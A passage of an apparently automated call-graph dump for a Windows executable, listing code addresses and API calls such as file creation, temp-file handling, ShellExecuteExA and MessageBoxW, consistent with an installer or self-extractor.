13304->13303 13306 4177ba GetFileType 13304->13306 13305->13257 13306->13303 13307->13303 13309 417749 GetFileType 13307->13309 13308->13302 13309->13307 13311 41752a GetEnvironmentStringsW 13310->13311 13312 41755d 13310->13312 13313 417532 13311->13313 13314 41753e GetEnvironmentStrings 13311->13314 13312->13313 13315 41754e 13312->13315 13317 417576 WideCharToMultiByte 13313->13317 13318 41756a GetEnvironmentStringsW 13313->13318 13314->13315 13316 414b9a 13314->13316 13315->13316 13320 4175f0 GetEnvironmentStrings 13315->13320 13323 4175fc 13315->13323 13333 4172c2 13316->13333 13321 4175aa 13317->13321 13322 4175dc FreeEnvironmentStringsW 13317->13322 13318->13316 13318->13317 13320->13316 13320->13323 13325 413e65 ctype 29 API calls 13321->13325 13322->13316 13324 413e65 ctype 29 API calls 13323->13324 13331 417617 13324->13331 13326 4175b0 13325->13326 13326->13322 13327 4175b9 WideCharToMultiByte 13326->13327 13329 4175d3 13327->13329 13330 4175ca 13327->13330 13328 41762d FreeEnvironmentStringsA 13328->13316 13329->13322 13332 413f9f ctype 29 API calls 13330->13332 13331->13328 13332->13329 13334 4172d4 13333->13334 13335 4172d9 GetModuleFileNameA 13333->13335 13807 418212 13334->13807 13337 4172fc 13335->13337 13338 413e65 ctype 29 API calls 13337->13338 13339 41731d 13338->13339 13340 41732d 13339->13340 13341 414c0c ctype 7 API calls 13339->13341 13340->13261 13341->13340 13343 417216 13342->13343 13346 41721b ctype 13342->13346 13344 418212 48 API calls 13343->13344 13344->13346 13345 413e65 ctype 29 API calls 13347 417248 13345->13347 13346->13345 13348 414c0c ctype 7 API calls 13347->13348 13354 41725c ctype 13347->13354 13348->13354 13349 41729f 13350 413f9f ctype 29 API calls 13349->13350 13351 4172ab 13350->13351 13351->13263 13352 413e65 ctype 29 API calls 13352->13354 13353 414c0c ctype 7 API calls 13353->13354 13354->13349 13354->13352 13354->13353 13356 4171ba 13355->13356 13358 4171bf 13355->13358 13357 418212 48 API calls 13356->13357 13357->13358 13358->13266 13836 401a51 GetVersionExA 13359->13836 13364 402170 30 API calls 13365 401067 13364->13365 13366 402170 30 API calls 13365->13366 13367 401079 13366->13367 13368 402170 30 API calls 13367->13368 13369 40108b GetCommandLineW 13368->13369 13844 401c80 13369->13844 13376 402170 30 API calls 13377 4010c7 13376->13377 13861 4045e2 13377->13861 13384 401c80 30 API calls 13385 4010f5 13384->13385 13893 401e3a 13385->13893 13390 403a9c ctype 29 API calls 13391 401118 13390->13391 13392 403a9c ctype 29 API calls 13391->13392 13393 401120 13392->13393 13394 40115a 13393->13394 14010 401e19 13393->14010 13900 40243e 13394->13900 13401 401182 13403 401186 13401->13403 13404 40119f 13401->13404 13402 401141 13405 403a9c ctype 29 API calls 13402->13405 13406 401197 13403->13406 14017 411093 MessageBoxW 13403->14017 13407 401c80 30 API calls 13404->13407 13408 401149 13405->13408 13413 403a9c ctype 29 API calls 13406->13413 13410 4011af 13407->13410 13411 40235e 30 API calls 13408->13411 13412 402170 30 API calls 13410->13412 13414 401152 13411->13414 13421 4011c1 13412->13421 13415 4019cc 13413->13415 13416 402323 30 API calls 13414->13416 13418 403a9c ctype 29 API calls 13415->13418 13416->13394 13417 4014b1 13913 401ecd 13417->13913 13419 4019d4 13418->13419 13422 403a9c ctype 29 API calls 13419->13422 13421->13417 14018 403d5a 13421->14018 13426 4019dc 13422->13426 13429 403a9c ctype 29 API calls 13426->13429 13430 4019e4 13429->13430 13436 403a9c ctype 29 API calls 13430->13436 13431 4014f0 13921 403a76 13431->13921 13432 4014d7 13437 4014e8 13432->13437 14062 411093 MessageBoxW 13432->14062 13433 401212 13438 401c80 30 API calls 13433->13438 13434 4011f9 13435 40120a 13434->13435 14045 411093 MessageBoxW 13434->14045 14053 4042d6 13435->14053 13441 4019ec 13436->13441 13444 401a2d 36 API calls 13437->13444 13443 40121f 13438->13443 13445 403a9c ctype 29 API calls 13441->13445 14046 404073 13443->14046 13448 4019a3 13444->13448 13630 401395 13445->13630 13451 403a9c ctype 29 API calls 13448->13451 13457 4019ae 13451->13457 13452 403a9c ctype 29 API calls 13458 401239 13452->13458 13453 4014f7 13926 408107 13453->13926 13455 40134f 13459 403a9c ctype 29 API calls 13455->13459 13461 403a9c ctype 29 API calls 13457->13461 13462 401c80 30 API calls 13458->13462 13463 401357 13459->13463 13466 4019b6 13461->13466 13467 401248 13462->13467 13468 403a9c ctype 29 API calls 13463->13468 13464 40152a 14063 411093 MessageBoxW 13464->14063 13465 40153b 13936 401a03 13465->13936 13470 403a9c ctype 29 API calls 13466->13470 13472 404073 30 API calls 13467->13472 13473 401362 13468->13473 13470->13406 13475 40125a 13472->13475 13476 403a9c ctype 29 API calls 13473->13476 13478 403a9c ctype 29 API calls 13475->13478 13479 40136a 13476->13479 13477 402170 30 API calls 13480 401562 13477->13480 13481 401262 13478->13481 13483 403a9c ctype 29 API calls 13479->13483 13939 402f15 13480->13939 13482 401c80 30 API calls 13481->13482 13485 401271 13482->13485 13486 401372 13483->13486 13488 404073 30 API calls 13485->13488 13489 403a9c ctype 29 API calls 13486->13489 13493 401286 13488->13493 13494 40137a 13489->13494 13490 401585 13495 4015f0 13490->13495 13499 4015b6 13490->13499 14064 40602f 13490->14064 13491 4015f9 13492 403a9c ctype 29 API calls 13491->13492 13496 401601 13492->13496 13497 403a9c ctype 29 API calls 13493->13497 13498 403a9c ctype 29 API calls 13494->13498 13503 403a9c ctype 29 API calls 13495->13503 13501 401ecd 30 API calls 13496->13501 13502 40128e 13497->13502 13504 401382 13498->13504 13499->13495 13517 40602f 33 API calls 13499->13517 13506 40160a 13501->13506 13507 403b4f ctype 5 API calls 13502->13507 13508 4018bc 13503->13508 13509 403a9c ctype 29 API calls 13504->13509 13981 405033 13506->13981 13512 40129f 13507->13512 13513 403a9c ctype 29 API calls 13508->13513 13514 40138a 13509->13514 13510 401d7a 30 API calls 13515 4015ab 13510->13515 13523 401c80 30 API calls 13512->13523 13518 4018c7 13513->13518 13519 403a9c ctype 29 API calls 13514->13519 13520 403a9c ctype 29 API calls 13515->13520 13516 401612 SetCurrentDirectoryA 13521 401651 13516->13521 13522 401624 SetCurrentDirectoryA 13516->13522 13524 4015d6 MessageBoxW 13517->13524 14095 401a2d 13518->14095 13519->13630 13520->13499 13525 40165a 13521->13525 13526 40172c 13521->13526 13528 403a9c ctype 29 API calls 13522->13528 13529 4012b6 13523->13529 13530 403a9c ctype 29 API calls 13524->13530 13531 401a18 31 API calls 13525->13531 13533 401787 13526->13533 14071 401d1b 13526->14071 13534 401631 13528->13534 13545 403a9c ctype 29 API calls 13529->13545 13530->13495 13535 401665 13531->13535 13532 4018de 13536 403a9c ctype 29 API calls 13532->13536 13986 401ce1 13533->13986 13539 403a9c ctype 29 API calls 13534->13539 13540 401693 13535->13540 13541 40169f 13535->13541 13542 4018e9 13536->13542 13539->13437 14067 401de3 13540->14067 13548 401a18 31 API calls 13541->13548 13547 403a9c ctype 29 API calls 13542->13547 13551 4012ce 13545->13551 13553 4018f1 13547->13553 13554 4016aa ShellExecuteExA 13548->13554 13550 401a18 31 API calls 13556 40174c 13550->13556 13552 4012eb 13551->13552 13557 401d7a 30 API calls 13551->13557 13558 40139d 13552->13558 13566 4012fd MessageBoxW 13552->13566 13559 403a9c ctype 29 API calls 13553->13559 13560 4016e6 13554->13560 13561 40170d 13554->13561 14075 40587c 13556->14075 13557->13552 13565 401c80 30 API calls 13558->13565 13567 4018fc 13559->13567 13568 4016f7 13560->13568 14070 411093 MessageBoxW 13560->14070 13564 403a9c ctype 29 API calls 13561->13564 13562 401c80 30 API calls 13569 4017ab 13562->13569 13571 40171e 13564->13571 13572 4013aa 13565->13572 13566->13558 13573 401315 13566->13573 13574 403a9c ctype 29 API calls 13567->13574 13577 403a9c ctype 29 API calls 13568->13577 13993 401e56 13569->13993 13579 403a9c ctype 29 API calls 13571->13579 13580 404073 30 API calls 13572->13580 13581 403a9c ctype 29 API calls 13573->13581 13582 401904 13574->13582 13584 4016ff 13577->13584 13578 403a9c ctype 29 API calls 13585 401767 13578->13585 13586 401726 13579->13586 13587 4013bf 13580->13587 13588 401320 13581->13588 13589 403a9c ctype 29 API calls 13582->13589 13591 403a9c ctype 29 API calls 13584->13591 13585->13533 13592 40176d 13585->13592 13594 40195a 13586->13594 13595 401d7a 30 API calls 13587->13595 13596 403a9c ctype 29 API calls 13588->13596 13597 40190c 13589->13597 13590 403a9c ctype 29 API calls 13598 4017c3 13590->13598 13599 401707 13591->13599 13593 4018af SetCurrentDirectoryA 13592->13593 14083 411093 MessageBoxW 13592->14083 13593->13495 13602 401960 WaitForSingleObject CloseHandle 13594->13602 13603 401974 SetCurrentDirectoryA 13594->13603 13604 4013c8 13595->13604 13605 401328 13596->13605 13606 403a9c ctype 29 API calls 13597->13606 13607 403a9c ctype 29 API calls 13598->13607 13600 401782 13599->13600 13600->13593 13602->13603 13609 403a9c ctype 29 API calls 13603->13609 13608 403a9c ctype 29 API calls 13604->13608 13610 403a9c ctype 29 API calls 13605->13610 13611 401914 13606->13611 13612 4017cb 13607->13612 13614 4013d3 13608->13614 13615 401981 13609->13615 13610->13435 13616 403a9c ctype 29 API calls 13611->13616 13613 401c80 30 API calls 13612->13613 13617 4017da 13613->13617 13618 403a9c ctype 29 API calls 13614->13618 13619 403a9c ctype 29 API calls 13615->13619 13620 40191c 13616->13620 13622 401e56 30 API calls 13617->13622 13623 4013db 13618->13623 13619->13437 13621 403a9c ctype 29 API calls 13620->13621 13624 401924 13621->13624 13625 4017ed 13622->13625 13626 401c80 30 API calls 13623->13626 13627 403a9c ctype 29 API calls 13624->13627 13628 403a9c ctype 29 API calls 13625->13628 13629 4013ea 13626->13629 13627->13630 13631 4017f5 13628->13631 13632 404073 30 API calls 13629->13632 13685 416c96 13630->13685 13633 401811 13631->13633 14084 401db8 13631->14084 13634 4013ff 13632->13634 13997 402634 13633->13997 13635 401d7a 30 API calls 13634->13635 13638 401408 13635->13638 13641 403a9c ctype 29 API calls 13638->13641 13644 401413 13641->13644 13642 401de3 30 API calls 13642->13633 13646 403a9c ctype 29 API calls 13644->13646 13649 40141b 13646->13649 13652 401c80 30 API calls 13649->13652 13655 40142a 13652->13655 13658 404073 30 API calls 13655->13658 13659 401443 13658->13659 13660 402634 30 API calls 13659->13660 13661 401450 13660->13661 13662 401d7a 30 API calls 13661->13662 13663 401459 13662->13663 13664 403a9c ctype 29 API calls 13663->13664 13665 401464 13664->13665 13666 403a9c ctype 29 API calls 13665->13666 13667 40146f 13666->13667 13668 403a9c ctype 29 API calls 13667->13668 13669 401477 13668->13669 13670 403a9c ctype 29 API calls 13669->13670 13671 401482 13670->13671 13672 403a9c ctype 29 API calls 13671->13672 13673 40148a 13672->13673 13674 403a9c ctype 29 API calls 13673->13674 13675 401492 13674->13675 13676 4042d6 ctype 34 API calls 13675->13676 13677 4014a6 13676->13677 13678 4042ad ctype 34 API calls 13677->13678 13678->13417 13680 414c3a 13679->13680 13681 414c3f 13679->13681 13682 4177fd ctype 7 API calls 13680->13682 13683 417836 ctype 7 API calls 13681->13683 13682->13681 13684 414c48 ExitProcess 13683->13684 16357 416cb8 13685->16357 13688 417039 13689 415523 35 API calls 13688->13689 13690 417044 13689->13690 13691 41716a UnhandledExceptionFilter 13690->13691 13692 414bfe 13690->13692 13691->13692 13707 413cc0 13693->13707 13696 4158f3 GetEnvironmentVariableA 13700 415912 13696->13700 13704 4159d0 13696->13704 13697 4158d9 13697->13696 13698 4158eb 13697->13698 13698->13279 13698->13280 13701 415957 GetModuleFileNameA 13700->13701 13703 41594f 13700->13703 13701->13703 13703->13704 13709 4179f0 13703->13709 13704->13698 13712 415883 GetModuleHandleA 13704->13712 13706 415a71 13705->13706 13706->13283 13708 413ccc GetVersionExA 13707->13708 13708->13696 13708->13697 13714 417a07 13709->13714 13713 41589a 13712->13713 13713->13698 13716 417a1f 13714->13716 13718 417a4f 13716->13718 13723 4187a8 13716->13723 13717 4187a8 6 API calls 13717->13718 13718->13717 13720 417b78 13718->13720 13722 417a03 13718->13722 13727 41866d 13718->13727 13720->13722 13738 416eea 13720->13738 13722->13704 13724 4187ba 13723->13724 13725 4187c6 13723->13725 13724->13716 13741 418a6c 13725->13741 13728 41868b InterlockedIncrement 13727->13728 13731 418678 13727->13731 13729 4186b1 13728->13729 13730 4186a7 InterlockedDecrement 13728->13730 13753 4186dc 13729->13753 13732 41570a ctype 29 API calls 13730->13732 13731->13718 13732->13729 13735 4186d1 InterlockedDecrement 13735->13731 13736 4186c7 13759 41576b LeaveCriticalSection 13736->13759 13778 415523 GetLastError TlsGetValue 13738->13778 13740 416eef 13740->13722 13742 418a9d GetStringTypeW 13741->13742 13748 418ab5 13741->13748 13743 418ab9 GetStringTypeA 13742->13743 13742->13748 13746 418ba1 13743->13746 13743->13748 13744 418ae0 GetStringTypeA 13744->13746 13746->13724 13747 418b04 13747->13746 13749 418b1a MultiByteToWideChar 13747->13749 13748->13744 13748->13747 13749->13746 13750 418b3e ctype 13749->13750 13750->13746 13751 418b78 MultiByteToWideChar 13750->13751 13751->13746 13752 418b91 GetStringTypeW 13751->13752 13752->13746 13754 418707 13753->13754 13758 4186be 13753->13758 13755 418723 13754->13755 13756 4187a8 6 API calls 13754->13756 13755->13758 13760 41881d 13755->13760 13756->13755 13758->13735 13758->13736 13759->13731 13761 418869 13760->13761 13762 41884d LCMapStringW 13760->13762 13765 4188b2 LCMapStringA 13761->13765 13766 4188cf 13761->13766 13762->13761 13763 418871 LCMapStringA 13762->13763 13763->13761 13764 4189ab 13763->13764 13764->13758 13765->13764 13766->13764 13767 4188e5 MultiByteToWideChar 13766->13767 13767->13764 13768 41890f 13767->13768 13768->13764 13769 418945 MultiByteToWideChar 13768->13769 13769->13764 13770 41895e LCMapStringW 13769->13770 13770->13764 13771 418979 13770->13771 13772 41897f 13771->13772 13774 4189bf 13771->13774 13772->13764 13773 41898d LCMapStringW 13772->13773 13773->13764 13774->13764 13775 4189f7 LCMapStringW 13774->13775 13775->13764 13776 418a0f WideCharToMultiByte 13775->13776 13776->13764 13779 41553f 13778->13779 13780 41557e SetLastError 13778->13780 13789 416efc 13779->13789 13780->13740 13783 415550 TlsSetValue 13784 415576 13783->13784 13785 415561 13783->13785 13786 414c0c ctype 7 API calls 13784->13786 13788 415567 GetCurrentThreadId 13785->13788 13787 41557d 13786->13787 13787->13780 13788->13780 13797 416f31 ctype 13789->13797 13790 415548 13790->13783 13790->13784 13791 416fe9 HeapAlloc 13791->13797 13792 41570a 29 API calls ctype 13792->13797 13793 415df1 ctype 5 API calls 13793->13797 13794 416894 ctype 6 API calls 13794->13797 13797->13790 13797->13791 13797->13792 13797->13793 13797->13794 13798 416f95 13797->13798 13801 41701e 13797->13801 13804 41576b LeaveCriticalSection 13798->13804 13800 416f9c 13800->13797 13805 41576b LeaveCriticalSection 13801->13805 13803 417025 13803->13797 13804->13800 13805->13803 13806->13288 13808 41821b 13807->13808 13809 418222 13807->13809 13811 417e3a 13808->13811 13809->13335 13812 41570a ctype 29 API calls 13811->13812 13813 417e4a 13812->13813 13822 417fe7 13813->13822 13817 417fdf 13817->13809 13819 417e86 GetCPInfo 13821 417e9c 13819->13821 13820 417e61 13835 41576b LeaveCriticalSection 13820->13835 13821->13820 13827 41808d GetCPInfo 13821->13827 13823 418007 13822->13823 13824 417ff7 GetOEMCP 13822->13824 13825 417e52 13823->13825 13826 41800c GetACP 13823->13826 13824->13823 13825->13819 13825->13820 13825->13821 13826->13825 13828 418178 13827->13828 13832 4180b0 13827->13832 13828->13820 13829 418a6c 6 API calls 13830 41812c 13829->13830 13831 41881d 9 API calls 13830->13831 13833 418150 13831->13833 13832->13829 13834 41881d 9 API calls 13833->13834 13834->13828 13835->13817 13837 40102d 13836->13837 13838 402170 13837->13838 13839 402180 13838->13839 13840 401055 13838->13840 13841 403a76 30 API calls 13839->13841 13840->13364 13842 40218a 13841->13842 13842->13840 13843 403a9c ctype 29 API calls 13842->13843 13843->13840 13845 401c9e 13844->13845 13846 402170 30 API calls 13845->13846 13847 40109a 13846->13847 13848 4038ee 13847->13848 13849 4038f8 __EH_prolog 13848->13849 13850 40396d 13849->13850 13852 401db8 30 API calls 13849->13852 13857 4010ac 13849->13857 13851 401e19 30 API calls 13850->13851 13853 40397c 13851->13853 13852->13849 13854 401d7a 30 API calls 13853->13854 13855 403989 13854->13855 13856 403a9c ctype 29 API calls 13855->13856 13856->13857 13858 403a9c 13857->13858 13859 413f9f ctype 29 API calls 13858->13859 13860 4010b4 13859->13860 13860->13376 13862 4045ec __EH_prolog 13861->13862 13863 40460b GetModuleFileNameW 13862->13863 13864 40463f 13862->13864 13866 404625 13863->13866 13871 404637 13863->13871 13865 40243e 30 API calls 13864->13865 13868 404652 13865->13868 13869 401d1b 30 API calls 13866->13869 13866->13871 13867 4010d5 13881 40235e 13867->13881 14100 404598 GetModuleFileNameA 13868->14100 13869->13871 13871->13867 13873 40468e 13876 403a9c ctype 29 API calls 13873->13876 13874 404663 AreFileApisANSI 14104 403b9c 13874->14104 13876->13871 13878 401d7a 30 API calls 13879 404686 13878->13879 13880 403a9c ctype 29 API calls 13879->13880 13880->13873 13882 402368 __EH_prolog 13881->13882 14122 4025a3 13882->14122 13884 402377 13885 403a9c ctype 29 API calls 13884->13885 13886 4010dd 13885->13886 13887 402323 13886->13887 13888 40232d __EH_prolog 13887->13888 13889 4025a3 30 API calls 13888->13889 13890 40233c 13889->13890 13891 403a9c ctype 29 API calls 13890->13891 13892 4010e5 13891->13892 13892->13384 14136 40220e 13893->14136 13896 403b4f 13897 403b58 13896->13897 13898 40110e 13897->13898 13899 403aa7 5 API calls ctype 13897->13899 13898->13390 13899->13897 13901 40116c 13900->13901 13902 40244e 13900->13902 13906 401af4 13901->13906 13903 403a76 30 API calls 13902->13903 13904 402455 13903->13904 13904->13901 13905 403a9c ctype 29 API calls 13904->13905 13905->13901 13907 401afe __EH_prolog 13906->13907 14149 405b6d 13907->14149 13909 401b30 13909->13401 13911 401b2c ctype 13911->13909 14152 405bca 13911->14152 14156 401ee5 13911->14156 13914 40243e 30 API calls 13913->13914 13915 4014c2 13914->13915 13916 405298 13915->13916 13917 401a2d 36 API calls 13916->13917 13918 4052a0 13917->13918 14220 4051c8 13918->14220 13922 413e65 ctype 29 API calls 13921->13922 13923 403a81 13922->13923 13924 403a9a 13923->13924 14322 413d3d RaiseException 13923->14322 13924->13453 13927 408111 __EH_prolog 13926->13927 13928 4042d6 ctype 34 API calls 13927->13928 13930 408120 13928->13930 13931 401d1b 30 API calls 13930->13931 13935 401526 13930->13935 14323 4081a8 13930->14323 14326 407f06 13930->14326 14353 408248 13930->14353 14361 402092 13930->14361 13931->13930 13935->13464 13935->13465 13937 403b9c 31 API calls 13936->13937 13938 40154c 13937->13938 13938->13477 13940 402f1f __EH_prolog 13939->13940 14439 403376 13940->14439 13943 401d7a 30 API calls 13944 402f53 13943->13944 13945 401d7a 30 API calls 13944->13945 13946 402f61 13945->13946 13947 403a76 30 API calls 13946->13947 13948 402f6b 13947->13948 13950 402f7e 13948->13950 14505 4034e3 13948->14505 13951 403037 13950->13951 13952 402f9a 13950->13952 14447 403113 13951->14447 14519 413220 13952->14519 13955 402fc2 13957 402fd5 13955->13957 13958 402fc8 13955->13958 13956 403042 13959 401d7a 30 API calls 13956->13959 13961 402170 30 API calls 13957->13961 14525 4131e0 13958->14525 13962 403050 13959->13962 13964 402fe8 13961->13964 13965 403065 13962->13965 13966 401d7a 30 API calls 13962->13966 13967 40602f 33 API calls 13964->13967 14495 40348a 13965->14495 13966->13965 13969 402ff7 13967->13969 13970 401d7a 30 API calls 13969->13970 13972 403004 13970->13972 13973 403a9c ctype 29 API calls 13972->13973 13974 403010 13973->13974 14529 40309d 13974->14529 13976 403021 13977 403a9c ctype 29 API calls 13976->13977 13978 403029 13977->13978 13979 4131e0 ctype 2 API calls 13978->13979 13980 403035 13979->13980 13980->13956 13982 405041 13981->13982 13983 405047 GetCurrentDirectoryA 13981->13983 13984 40243e 30 API calls 13982->13984 13985 405059 13983->13985 13984->13983 13985->13516 13987 402170 30 API calls 13986->13987 13988 401796 13987->13988 13989 405d0b 13988->13989 13990 40179e 13989->13990 13991 405d16 13989->13991 13990->13562 13991->13990 13992 401db8 30 API calls 13991->13992 13992->13990 13994 4017bb 13993->13994 13995 401e69 13993->13995 13994->13590 13995->13994 16172 402399 13995->16172 13998 40263e __EH_prolog 13997->13998 13999 401ce1 30 API calls 13998->13999 14000 402651 13999->14000 14001 401de3 30 API calls 14000->14001 14002 402660 14001->14002 14003 401ce1 30 API calls 14002->14003 14011 40220e 30 API calls 14010->14011 14012 401138 14011->14012 14013 401d7a 14012->14013 14014 401d98 14013->14014 14015 401d86 14013->14015 14014->13402 14016 402170 30 API calls 14015->14016 14016->14014 14017->13406 14019 403d64 __EH_prolog 14018->14019 14020 4042d6 ctype 34 API calls 14019->14020 14043 403d75 14020->14043 14021 402ee1 30 API calls 14021->14043 14023 403eec 14024 403a9c ctype 29 API calls 14023->14024 14025 403ef4 14024->14025 14026 403a9c ctype 29 API calls 14025->14026 14027 403efc 14026->14027 14028 403a9c ctype 29 API calls 14027->14028 14029 4011f5 14028->14029 14029->13433 14029->13434 14030 40243e 30 API calls 14030->14043 14031 403f09 14032 403a9c ctype 29 API calls 14031->14032 14033 403f11 14032->14033 14035 403a9c ctype 29 API calls 14033->14035 14034 40411f 30 API calls 14034->14043 14036 403f19 14035->14036 14039 403a9c ctype 29 API calls 14036->14039 14037 401ee5 30 API calls 14037->14043 14040 403f21 14039->14040 14041 403a9c ctype 29 API calls 14040->14041 14041->14029 14042 403a9c 29 API calls ctype 14042->14043 14043->14021 14043->14023 14043->14029 14043->14030 14043->14031 14043->14034 14043->14037 14043->14042 16180 403f3c 14043->16180 16190 4040be 14043->16190 16200 40213f 14043->16200 14045->13435 14047 40408b 14046->14047 14048 4040a5 14047->14048 14049 40408f 14047->14049 14051 401ce1 30 API calls 14048->14051 14050 402170 30 API calls 14049->14050 14052 401231 14050->14052 14051->14052 14052->13452 14054 4042eb ctype 34 API calls 14053->14054 14055 401344 14054->14055 14056 4042ad 14055->14056 14057 4042b8 14056->14057 14058 4042d6 ctype 34 API calls 14057->14058 14059 4042c0 14058->14059 14060 403a9c ctype 29 API calls 14059->14060 14061 4042c8 14060->14061 14061->13455 14062->13437 14063->13437 16205 405f5e 14064->16205 14068 4021c4 30 API calls 14067->14068 14069 401df3 14068->14069 14069->13541 14070->13568 14072 401d38 14071->14072 14073 402170 30 API calls 14072->14073 14074 40173e 14073->14074 14074->13550 14076 405886 __EH_prolog 14075->14076 14077 404d51 30 API calls 14076->14077 14078 405895 14077->14078 14079 405806 32 API calls 14078->14079 14080 4058a2 14079->14080 14081 403a9c ctype 29 API calls 14080->14081 14082 401753 14081->14082 14082->13578 14083->13600 14085 4021c4 30 API calls 14084->14085 14086 401805 14085->14086 14086->13642 14096 401a35 14095->14096 14097 401a39 14095->14097 14096->13532 16267 404c4a 14097->16267 14101 4045c7 14100->14101 14102 4045d9 14100->14102 14101->14102 14117 4046ab 14101->14117 14102->13873 14102->13874 14105 403ba6 __EH_prolog 14104->14105 14106 402170 30 API calls 14105->14106 14107 403bc9 14106->14107 14108 403c10 14107->14108 14109 403be1 MultiByteToWideChar 14107->14109 14111 402170 30 API calls 14107->14111 14110 401ce1 30 API calls 14108->14110 14109->14108 14112 403bfb 14109->14112 14113 403c26 14110->14113 14111->14109 14121 413d3d RaiseException 14112->14121 14115 403a9c ctype 29 API calls 14113->14115 14116 403c2e 14115->14116 14116->13878 14118 4046c1 14117->14118 14118->14118 14119 40243e 30 API calls 14118->14119 14120 4046d0 14119->14120 14120->14102 14121->14108 14123 4025ad __EH_prolog 14122->14123 14124 402170 30 API calls 14123->14124 14125 4025c9 14124->14125 14126 401db8 30 API calls 14125->14126 14127 4025d6 14126->14127 14128 401db8 30 API calls 14127->14128 14129 4025e0 14128->14129 14130 401db8 30 API calls 14129->14130 14131 4025ea 14130->14131 14132 401ce1 30 API calls 14131->14132 14133 4025f6 14132->14133 14134 403a9c ctype 29 API calls 14133->14134 14135 4025fe 14134->14135 14135->13884 14138 402218 __EH_prolog 14136->14138 14137 40224c 14140 402170 30 API calls 14137->14140 14138->14137 14139 402241 14138->14139 14141 401ce1 30 API calls 14139->14141 14142 40225f 14140->14142 14148 401105 14141->14148 14143 402170 30 API calls 14142->14143 14144 40226c 14143->14144 14145 401ce1 30 API calls 14144->14145 14146 4022a0 14145->14146 14147 403a9c ctype 29 API calls 14146->14147 14147->14148 14148->13896 14159 405b4c 14149->14159 14154 405bd7 14152->14154 14155 405c03 14154->14155 14211 405ba8 14154->14211 14155->13911 14216 40248c 14156->14216 14162 405b2f 14159->14162 14165 4059b3 14162->14165 14166 4059bd __EH_prolog 14165->14166 14167 405a25 14166->14167 14168 4059ce 14166->14168 14183 405a63 14167->14183 14169 401c80 30 API calls 14168->14169 14171 4059d9 AreFileApisANSI 14169->14171 14186 403d04 14171->14186 14174 405a30 CreateFileW 14175 405a53 14174->14175 14175->13911 14179 403a9c ctype 29 API calls 14180 405a17 14179->14180 14181 403a9c ctype 29 API calls 14180->14181 14182 405a1f 14181->14182 14182->14175 14184 405a6d FindCloseChangeNotification 14183->14184 14185 405a2c 14183->14185 14184->14185 14185->14174 14185->14175 14194 403c43 14186->14194 14189 40597a 14190 405a63 FindCloseChangeNotification 14189->14190 14191 405985 14190->14191 14192 405989 CreateFileA 14191->14192 14193 4059ae 14191->14193 14192->14193 14193->14179 14195 403c4d __EH_prolog 14194->14195 14196 40243e 30 API calls 14195->14196 14197 403c6f 14196->14197 14198 403cd3 14197->14198 14199 403c90 WideCharToMultiByte 14197->14199 14201 40243e 30 API calls 14197->14201 14208 403d24 14198->14208 14199->14198 14202 403cbe 14199->14202 14201->14199 14207 413d3d RaiseException 14202->14207 14204 403a9c ctype 29 API calls 14206 403cf0 14204->14206 14206->14189 14207->14198 14209 40243e 30 API calls 14208->14209 14210 403ce8 14209->14210 14210->14204 14212 405bb5 14211->14212 14215 405b7b ReadFile 14212->14215 14214 405bc6 14214->14154 14215->14214 14217 401eef 14216->14217 14218 4024a0 14216->14218 14217->13911 14219 40243e 30 API calls 14218->14219 14219->14217 14221 4051d2 __EH_prolog 14220->14221 14236 405268 14221->14236 14224 405243 14262 4051a4 14224->14262 14225 4051a4 SetFileAttributesA DeleteFileA 14227 4051e3 14225->14227 14227->14224 14227->14225 14230 4014d3 14227->14230 14231 403a9c ctype 29 API calls 14227->14231 14234 405268 30 API calls 14227->14234 14235 40522c GetLastError 14227->14235 14239 40511b 14227->14239 14253 4058cd 14227->14253 14261 40498d CreateDirectoryA 14227->14261 14228 40524b 14229 403a9c ctype 29 API calls 14228->14229 14229->14230 14230->13431 14230->13432 14231->14227 14234->14227 14235->14227 14235->14230 14237 40243e 30 API calls 14236->14237 14238 405281 14237->14238 14238->14227 14240 405125 __EH_prolog 14239->14240 14241 40243e 30 API calls 14240->14241 14242 405141 14241->14242 14267 40506f 14242->14267 14244 40514c 14252 405164 14244->14252 14272 4050e5 14244->14272 14245 403a9c ctype 29 API calls 14247 405191 14245->14247 14247->14227 14250 405170 14251 4050e5 33 API calls 14250->14251 14250->14252 14251->14252 14252->14245 14254 4058d7 __EH_prolog 14253->14254 14293 404d51 14254->14293 14259 403a9c ctype 29 API calls 14260 4058fd 14259->14260 14260->14227 14261->14227 14263 4051b0 14262->14263 14264 4051ac 14262->14264 14316 404bdc 14263->14316 14264->14228 14266 4051b8 14266->14228 14268 405083 GetTempPathA 14267->14268 14269 40507d 14267->14269 14271 405095 14268->14271 14270 40243e 30 API calls 14269->14270 14270->14268 14271->14244 14273 4051a4 2 API calls 14272->14273 14274 4050ee 14273->14274 14284 4050ab 14274->14284 14276 4050ff 14277 405111 14276->14277 14289 4052f9 14276->14289 14277->14252 14279 4047db 14277->14279 14280 4047e9 14279->14280 14281 4047ef GetWindowsDirectoryA 14279->14281 14282 40243e 30 API calls 14280->14282 14283 404802 14281->14283 14282->14281 14283->14250 14285 4050c0 14284->14285 14286 4050c8 GetTempFileNameA 14284->14286 14287 40243e 30 API calls 14285->14287 14288 4050dd 14286->14288 14287->14286 14288->14276 14290 405305 14289->14290 14292 405316 14289->14292 14291 40243e 30 API calls 14290->14291 14291->14292 14292->14277 14294 40243e 30 API calls 14293->14294 14295 404d68 14294->14295 14296 405806 14295->14296 14297 405810 __EH_prolog 14296->14297 14302 40553a 14297->14302 14303 40551a FindClose 14302->14303 14304 40554b 14303->14304 14305 405566 14304->14305 14306 40554f FindFirstFileA 14304->14306 14309 40551a 14305->14309 14306->14305 14307 40556a 14306->14307 14312 40557f 14307->14312 14310 405524 FindClose 14309->14310 14311 40552f 14309->14311 14310->14311 14311->14259 14313 4055bd 14312->14313 14314 4046ab 30 API calls 14313->14314 14315 4055da 14314->14315 14315->14305 14321 40489c SetFileAttributesA 14316->14321 14318 404be6 14319 404bea 14318->14319 14320 404bec DeleteFileA 14318->14320 14319->14266 14320->14266 14321->14318 14322->13924 14324 402170 30 API calls 14323->14324 14325 4081c8 14324->14325 14325->13930 14327 407f10 __EH_prolog 14326->14327 14328 401c80 30 API calls 14327->14328 14341 407f67 14327->14341 14331 407f4c 14328->14331 14329 401c80 30 API calls 14333 407f78 14329->14333 14330 408018 14332 4042d6 ctype 34 API calls 14330->14332 14369 408062 14331->14369 14335 408027 14332->14335 14336 408062 35 API calls 14333->14336 14339 4042ad ctype 34 API calls 14335->14339 14340 407f87 14336->14340 14338 403a9c ctype 29 API calls 14338->14341 14342 408033 14339->14342 14343 403a9c ctype 29 API calls 14340->14343 14341->14329 14351 407f93 14341->14351 14345 4042d6 